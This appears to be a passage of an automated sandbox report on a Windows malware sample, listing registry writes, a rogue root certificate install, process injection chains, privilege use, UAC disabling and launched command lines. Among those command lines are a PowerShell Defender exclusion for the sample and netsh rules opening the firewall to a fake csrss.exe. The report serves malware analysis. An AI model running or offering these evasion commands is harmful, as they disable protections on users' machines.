Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 1760 wrote to memory of 1784 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe

"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2236 -s 2228

C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe

"C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe"

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

"C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe"

C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe

"C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240329015412.log C:\Windows\Logs\CBS\CbsPersist_20240329015412.cab

C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe

"C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe"

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

"C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

